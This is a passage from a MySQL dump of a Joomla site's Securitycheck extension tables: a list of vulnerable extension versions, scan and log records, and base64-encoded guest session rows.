INSERT INTO `j25_securitycheck_db` VALUES (1,'Joomla!','core','3.0.0','==','3.0.0','=='),(2,'com_fss','component','1.9.1.1447','<=','3.0.0','>='),(3,'com_commedia','component','3.1','<=','3.0.0','>='),(4,'Joomla!','core','3.0.1','<=','3.0.1','<='),(5,'com_jnews','component','7.9.1','<','3.0.0','>='),(6,'com_bch','component','---','==','3.0.0','>='),(7,'com_aclassif','component','---','==','3.0.0','>='),(8,'com_rsfiles','component','1.0.0 Rev ','==','3.0.0','>='),(9,'Joomla!','core','3.0.2','<=','3.0.0','>='),(10,'com_jnews','component','8.0.1','<=','3.0.0','>='),(11,'com_attachments','component','3.1.1','<','3.0.0','>='),(12,'Joomla!','core','3.1.4','<=','3.0.0','>='),(13,'com_sectionex','component','2.5.96','<=','3.0.0','>='),(14,'com_joomsport','component','1.7.1','<','3.0.0','>='),(15,'Joomla!','core','3.1.5','<=','3.0.0','>='),(16,'com_flexicontent','component','2.1.3','<=','3.0.0','>='),(17,'com_mijosearch','component','2.0.1','<=','3.0.0','>='),(18,'com_acesearch','component','3.0','==','3.0.0','>='),(19,'com_melody','component','1.6.25','<=','3.0.0','>='),(20,'com_sexypolling','component','1.0.8','<=','3.0.0','>='),(21,'com_komento','component','1.7.2','<=','3.0.0','>='),(22,'com_community','component','2.6','==','3.0.0','>='),(23,'Joomla!','core','3.2.2','<=','3.0.0','>='),(24,'com_youtubegallery','component','3.4.0','==','3.0.0','>='),(25,'com_pbbooking','component','2.4','==','3.0.0','>='),(26,'com_extplorer','component','2.1.3','==','3.0.0','>='),(27,'com_freichat','component','3.5','<=','3.0.0','>='),(28,'com_multicalendar','component','4.0.2','==','3.0.0','>='),(29,'com_kunena','component','3.0.4','==','3.0.0','>='),(30,'com_jchat','component','2.2','==','3.0.0','>='),(31,'com_youtubegallery','component','4.1.7','<=','3.0.0','>='),(32,'com_kunena','component','3.0.5','==','3.0.0','>='),(33,'com_spidervideoplayer','component','2.8.3','==','3.0.0','>='),(34,'com_akeeba','component','3.11.4','<','3.0.0','>='),(35,'com_spidercalendar','component','3.2.6','<=','3.0.0','>='),(36,'com_spidercontacts','component','1.3.6','<=','3.0.0','>='),(37,'com_formmaker','component','3.4.1','<','3,0.0','>='),(38,'com_facegallery','component','1.0','==','3.0.0','>='),(39,'com_macgallery','component','1.5','<=','3.0.0','>='),(40,'Joomla!','core','3.3.4','<','3.0.0','>='),(41,'Joomla!','core','3.3.4','<=','3.0.0','>='),(42,'com_creativecontactform','component','2.0.0','<=','3.0.0','>='),(43,'com_xcloner-backupandrestore','component','3.5.1','==','3.0.0','>='),(44,'com_eventbooking','component','---','==','3.0.0','>='),(45,'com_hdflvplayer','component','2.1.0.1','<=','3.0.0','>='),(46,'com_jclassifiedsmanager','component','2.0.0','<','3.0.0','>='),(47,'com_simplephotogallery','component','1.0','==','3.0.0','>='),(48,'com_ecommercewd','component','1.2.5','==','3.0.0','>='),(49,'com_spiderfaq','component','1.1','==','3.0.0','>='),(50,'com_rand','component','1.5','==','3.0.0','>='),(51,'com_gallery_wd','component','1.2.5','==','3.0.0','>='),(52,'com_contactformmaker','component','1.0.1','==','3.0.0','>='),(53,'com_osproperty','component','2.8.0','<','3.0.0','>='),(54,'com_eqfullevent','component','1.0.0','<=','3.0.0','>='),(55,'Joomla!','core','3.4.1','<=','3.0.0','>='),(56,'com_kunena','component','4.0.2','==','3.0.0','>='),(57,'com_j2store','component','3.1.6','==','2.5.0,3.0.0','>=,>='),(58,'com_kunena','component','4.0.3','<=','2.5.0,3.0.0','>=,>='),(59,'com_helpdeskpro','component','1.4.0','<','2.5.0,3.0.0','>=,>='),(60,'mod_jshopping_products_wfl','module','4.10.4','<=','3.0.0','>='),(61,'Joomla!','core','3.4.3','<=','3.0.0','>='),(62,'com_komento','component','2.0.5','<','3.0.0','>='),(63,'Joomla!','core','3.4.4','<=','3.0.0','>=');
/*!40000 ALTER TABLE `j25_securitycheck_db` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_securitycheck_file_manager`
--

DROP TABLE IF EXISTS `j25_securitycheck_file_manager`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_securitycheck_file_manager` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `last_check` datetime DEFAULT NULL,
  `files_scanned` int(10) DEFAULT '0',
  `files_with_incorrect_permissions` int(10) DEFAULT '0',
  `estado` varchar(40) DEFAULT 'IN_PROGRESS',
  `estado_clear_data` varchar(40) DEFAULT 'DELETING_ENTRIES',
  PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_securitycheck_file_manager`
--

LOCK TABLES `j25_securitycheck_file_manager` WRITE;
/*!40000 ALTER TABLE `j25_securitycheck_file_manager` DISABLE KEYS */;
INSERT INTO `j25_securitycheck_file_manager` VALUES (1,'2015-12-08 16:13:19',100,0,'ENDED','DELETING_ENTRIES');
/*!40000 ALTER TABLE `j25_securitycheck_file_manager` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_securitycheck_logs`
--

DROP TABLE IF EXISTS `j25_securitycheck_logs`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_securitycheck_logs` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `ip` varchar(35) NOT NULL,
  `time` datetime NOT NULL,
  `tag_description` varchar(50) DEFAULT NULL,
  `description` varchar(300) NOT NULL,
  `type` varchar(50) DEFAULT NULL,
  `uri` varchar(100) DEFAULT NULL,
  `component` varchar(150) DEFAULT '---',
  `marked` tinyint(1) DEFAULT '0',
  `original_string` varchar(300) DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_securitycheck_logs`
--

LOCK TABLES `j25_securitycheck_logs` WRITE;
/*!40000 ALTER TABLE `j25_securitycheck_logs` DISABLE KEYS */;
INSERT INTO `j25_securitycheck_logs` VALUES (1,'77.120.137.35','2015-12-08 16:27:13','SESSION_PROTECTION','User access attempt with one session active','SESSION_PROTECTION','/administrator/index.php','---',0,'VXNlcm5hbWU6IGFkbWlu');
/*!40000 ALTER TABLE `j25_securitycheck_logs` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_securitycheck_storage`
--

DROP TABLE IF EXISTS `j25_securitycheck_storage`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_securitycheck_storage` (
  `storage_key` varchar(255) NOT NULL,
  `storage_value` longtext NOT NULL,
  PRIMARY KEY (`storage_key`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_securitycheck_storage`
--

LOCK TABLES `j25_securitycheck_storage` WRITE;
/*!40000 ALTER TABLE `j25_securitycheck_storage` DISABLE KEYS */;
INSERT INTO `j25_securitycheck_storage` VALUES ('filemanager_resume','{\"files_scanned\":12279,\"files_with_incorrect_permissions\":2,\"last_check\":\"2015-12-08 16:13:25\",\"filename\":\"4zrv2l10zugyx4vay1ge.php\"}');
/*!40000 ALTER TABLE `j25_securitycheck_storage` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_securitycheckpro_update_database`
--

DROP TABLE IF EXISTS `j25_securitycheckpro_update_database`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_securitycheckpro_update_database` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `version` varchar(10) DEFAULT NULL,
  `last_check` datetime DEFAULT NULL,
  `message` varchar(300) DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_securitycheckpro_update_database`
--

LOCK TABLES `j25_securitycheckpro_update_database` WRITE;
/*!40000 ALTER TABLE `j25_securitycheckpro_update_database` DISABLE KEYS */;
INSERT INTO `j25_securitycheckpro_update_database` VALUES (1,'1.0.23',NULL,NULL);
/*!40000 ALTER TABLE `j25_securitycheckpro_update_database` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_session`
--

DROP TABLE IF EXISTS `j25_session`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_session` (
  `session_id` varbinary(192) NOT NULL,
  `client_id` tinyint(3) unsigned DEFAULT NULL,
  `guest` tinyint(3) unsigned DEFAULT '1',
  `time` int(11) NOT NULL DEFAULT '0',
  `data` longtext COLLATE utf8mb4_unicode_ci,
  `userid` int(11) DEFAULT '0',
  `username` varchar(150) COLLATE utf8mb4_unicode_ci DEFAULT '',
  PRIMARY KEY (`session_id`),
  KEY `userid` (`userid`),
  KEY `time` (`time`),
  KEY `client_id_guest` (`client_id`,`guest`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_session`
--

LOCK TABLES `j25_session` WRITE;
/*!40000 ALTER TABLE `j25_session` DISABLE KEYS */;
INSERT INTO `j25_session` VALUES (_binary '007158c42069276b4a7ac013984ecefc',0,1,1663907414,'joomla|s:664:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjI6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTY2MzkwNzQxNDtzOjQ6Imxhc3QiO2k6MTY2MzkwNzQxNDtzOjM6Im5vdyI7aToxNjYzOTA3NDE0O319czo4OiJyZWdpc3RyeSI7TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjA6e31zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO31zOjQ6InVzZXIiO086MjA6Ikpvb21sYVxDTVNcVXNlclxVc2VyIjoxOntzOjI6ImlkIjtpOjA7fX19czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9\";',0,''),(_binary '0121e290b66ab8e78338b5cc4c630b5d',0,1,1663912469,'joomla|s:664:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjI6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTY2MzkxMjQ2OTtzOjQ6Imxhc3QiO2k6MTY2MzkxMjQ2OTtzOjM6Im5vdyI7aToxNjYzOTEyNDY5O319czo4OiJyZWdpc3RyeSI7TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjA6e31zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO31zOjQ6InVzZXIiO086MjA6Ikpvb21sYVxDTVNcVXNlclxVc2VyIjoxOntzOjI6ImlkIjtpOjA7fX19czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9\";',0,''),(_binary '01d7b3a230b0298c5a4143403fe17808',0,1,1663907536,'joomla|s:664:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjI6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTY2MzkwNzUzNjtzOjQ6Imxhc3QiO2k6MTY2MzkwNzUzNjtzOjM6Im5vdyI7aToxNjYzOTA3NTM2O319czo4OiJyZWdpc3RyeSI7TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjA6e31zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO31zOjQ6InVzZXIiO086MjA6Ikpvb21sYVxDTVNcVXNlclxVc2VyIjoxOntzOjI6ImlkIjtpOjA7fX19czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9\";',0,''),(_binary '01daa6fb28867de6312dad7af86bb307',0,1,1663916495,'joomla|s:664:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjI6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTY2MzkxNjQ5NTtzOjQ6Imxhc3QiO2k6MTY2MzkxNjQ5NTtzOjM6Im5vdyI7aToxNjYzOTE2NDk1O319czo4OiJyZWdpc3RyeSI7TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjA6e31zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO31zOjQ6InVzZXIiO086MjA6Ikpvb21sYVxDTVNcVXNlclxVc2VyIjoxOntzOjI6ImlkIjtpOjA7fX19czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9\";',0,''),(_binary '020a25c2127a75093d7f48cc70836522',0,1,1663907387,'joomla|s:664:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjI6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTY2MzkwNzM4NztzOjQ6Imxhc3QiO2k6MTY2MzkwNzM4NztzOjM6Im5vdyI7aToxNjYzOTA3Mzg3O319czo4OiJyZWdpc3RyeSI7TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjA6e31zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO31zOjQ6InVzZXIiO086MjA6Ikpvb21sYVxDTVNcVXNlclxVc2VyIjoxOntzOjI6ImlkIjtpOjA7fX19czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9\";',0,''),(_binary '0262f2b6b508f6661abd9d0d42fc2ce2',0,1,1663908369,'joomla|s:664:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjI6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTY2MzkwODM2OTtzOjQ6Imxhc3QiO2k6MTY2MzkwODM2OTtzOjM6Im5vdyI7aToxNjYzOTA4MzY5O319czo4OiJyZWdpc3RyeSI7TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjA6e31zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO31zOjQ6InVzZXIiO086MjA6Ikpvb21sYVxDTVNcVXNlclxVc2VyIjoxOntzOjI6ImlkIjtpOjA7fX19czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9\";',0,''),(_binary '02bb41953285280ce3299f8a129e6384',0,1,1663907392,'joomla|s:664:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjI6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTY2MzkwNzM5MjtzOjQ6Imxhc3QiO2k6MTY2MzkwNzM5MjtzOjM6Im5vdyI7aToxNjYzOTA3MzkyO319czo4OiJyZWdpc3RyeSI7TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjA6e31zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO31zOjQ6InVzZXIiO086MjA6Ikpvb21sYVxDTVNcVXNlclxVc2VyIjoxOntzOjI6ImlkIjtpOjA7fX19czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9\";',0,''),(_binary '06c8370df102e01d50061b1e3b73b9ac',0,1,1663916490,'joomla|s:664:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjI6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTY2MzkxNjQ5MDtzOjQ6Imxhc3QiO2k6MTY2MzkxNjQ5MDtzOjM6Im5vdyI7aToxNjYzOTE2NDkwO319czo4OiJyZWdpc3RyeSI7TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjA6e31zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO31zOjQ6InVzZXIiO086MjA6Ikpvb21sYVxDTVNcVXNlclxVc2VyIjoxOntzOjI6ImlkIjtpOjA7fX19czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9\";',0,''),(_binary '07f5add1db02ce295dd598e67e15eeef',0,1,1663905613,'joomla|s:664:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjI6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTY2MzkwNTYxMztzOjQ6Imxhc3QiO2k6MTY2MzkwNTYxMztzOjM6Im5vdyI7aToxNjYzOTA1NjEzO319czo4OiJyZWdpc3RyeSI7TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjA6e31zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO31zOjQ6InVzZXIiO086MjA6Ikpvb21sYVxDTVNcVXNlclxVc2VyIjoxOntzOjI6ImlkIjtpOjA7fX19czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9\";',0,''),(_binary '09cfe823fc88efd391171179a1758209',0,1,1663916437,'joomla|s:664:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjI6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTY2MzkxNjQzNztzOjQ6Imxhc3QiO2k6MTY2MzkxNjQzNztzOjM6Im5vdyI7aToxNjYzOTE2NDM3O319czo4OiJyZWdpc3RyeSI7TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjA6e31zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO31zOjQ6InVzZXIiO086MjA6Ikpvb21sYVxDTVNcVXNlclxVc2VyIjoxOntzOjI6ImlkIjtpOjA7fX19czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9\";',0,''),(_binary '0cd8e5c5567af2eaf6b603f80604f347',0,1,1663916662,'joomla|s:664:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjI6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTY2MzkxNjY2MjtzOjQ6Imxhc3QiO2k6MTY2MzkxNjY2MjtzOjM6Im5vdyI7aToxNjYzOTE2NjYyO319czo4OiJyZWdpc3RyeSI7TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjA6e31zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO31zOjQ6InVzZXIiO086MjA6Ikpvb21sYVxDTVNcVXNlclxVc2VyIjoxOntzOjI6ImlkIjtpOjA7fX19czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9\";',0,''),(_binary '0d4017d21c11b165d7829053c2b6b31b',0,1,1663916428,'joomla|s:664:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjI6e3M6NzoiY291bnRlciI7aTo1O3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTY2MzkxNjE2NTtzOjQ6Imxhc3QiO2k6MTY2MzkxNjI4NDtzOjM6Im5vdyI7aToxNjYzOTE2NDI4O319czo4OiJyZWdpc3RyeSI7TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjA6e31zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO31zOjQ6InVzZXIiO086MjA6Ikpvb21sYVxDTVNcVXNlclxVc2VyIjoxOntzOjI6ImlkIjtpOjA7fX19czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9\";',0,''),(_binary '0d71314907cd33d84591e76f948b0c78',0,1,1663916589,'joomla|s:664:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjI6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTY2MzkxNjU4OTtzOjQ6Imxhc3QiO2k6MTY2MzkxNjU4OTtzOjM6Im5vdyI7aToxNjYzOTE2NTg5O319czo4OiJyZWdpc3RyeSI7TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjA6e31zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO31zOjQ6InVzZXIiO086MjA6Ikpvb21sYVxDTVNcVXNlclxVc2VyIjoxOntzOjI6ImlkIjtpOjA7fX19czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9\";',0,''),(_binary '1061b71a1f07331e9f2a635f91c2cff7',0,1,1663907552,'joomla|s:664:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjI6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTY2MzkwNzU1MjtzOjQ6Imxhc3QiO2k6MTY2MzkwNzU1MjtzOjM6Im5vdyI7aToxNjYzOTA3NTUyO319czo4OiJyZWdpc3RyeSI7TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjA6e31zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO31zOjQ6InVzZXIiO086MjA6Ikpvb21sYVxDTVNcVXNlclxVc2VyIjoxOntzOjI6ImlkIjtpOjA7fX19czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9\";',0,''),(_binary '12edc9e6b1725aed5e26040766f7785e',0,1,1663916466,'joomla|s:664:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjI6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTY2MzkxNjQ2NjtzOjQ6Imxhc3QiO2k6MTY2MzkxNjQ2NjtzOjM6Im5vdyI7aToxNjYzOTE2NDY2O319czo4OiJyZWdpc3RyeSI7TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjA6e31zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO31zOjQ6InVzZXIiO086MjA6Ikpvb21sYVxDTVNcVXNlclxVc2VyIjoxOntzOjI6ImlkIjtpOjA7fX19czoxNDoiACoAaW5pdGlhbGl6ZWQiO2